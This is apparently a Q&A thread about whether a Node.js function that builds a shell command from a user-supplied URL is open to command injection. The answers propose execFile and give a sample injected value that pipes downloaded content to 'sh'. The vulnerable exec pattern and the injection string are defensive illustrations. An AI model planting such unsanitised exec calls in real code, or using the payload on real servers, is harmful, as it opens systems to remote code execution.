# Securing node.js exec command line in Linux (Ubuntu) server

Tags: node.js, linux, shell, ubuntu, command

Example of codes that will execute command line using from Node.js. It will return full HTML of page.

```
const getPageHtmlResponse = (fullUrl) => {//fullUrl is come from input form in web page
return new Promise((resolve, reject) => {
    try {
        const exec = require('child_process').exec
        exec("curl "+fullUrl, (err, stdout, stderr) => resolve(stdout))
    } catch (error) {
        resolve(false)
    }
});
}
```

1. Is this code can be insecure? I mean the hackers can inject another command on it to manipulate the system or server?
2. *If yes*, there's good way to escape it or make it secure?

Comment: 1. Never trust user input. 2. Never trust user input.

Answer (score 1):

Don't use `child_process.exec()`. A clever crafted string from user input will launch arbitrary code from your program, which you do want to avoid.

Instead, use `child_process.execFile()` as follows:

```
const getPageHtmlResponse = (fullUrl) => {//fullUrl is come from input form in web page

return new Promise((resolve, reject) => {
    try {
        const execFile = require('child_process').execFile
        execFile("/path/to/curl", fullUrl, (err, stdout, stderr) => resolve(stdout))
    } catch (error) {
        resolve(false)
    }
});
}
```

`execFile` takes the pre-parsed list of commands and does not launch an intermediate shell, so there is less risk of launching a program through an untrusted URL.

#### See also

[child_process.execFile](https://nodejs.org/api/child_process.html#child_process_child_process_execfile_file_args_options_callback)

Comment: by this solution, how to get `fullUrl` from `/path/to/curl` by file?

Comment: I don't understand - in your function, you get passed `fullUrl` as a parameter. That's what you use in the call to `.execFile()` then. You need to specify the full path to the `curl` binary. This is most likely `/usr/bin/curl`

Comment: `/usr/bin/curl` is path of curl in my machine. So there's no way to inject something to `fullUrl` by using this method? @Corion

Comment: No, by using the above method, whatever is in `fullUrl` will get passed as one single argument to `curl` and will not be subject to shell expansion or shell interpretation.

Answer (score 0):

If the user writes a script and put it on `http://blahblah.blah/b` and instead of this URL it provides a tricky one: `http://blahblah.blah/b | sh`, now your code will create a process and execute `curl http://blahblah.blah/b | sh`. and the script could be anything.
one thing you should consider is that, to validate user input URL, check it to no contain extra commands, and be the only url.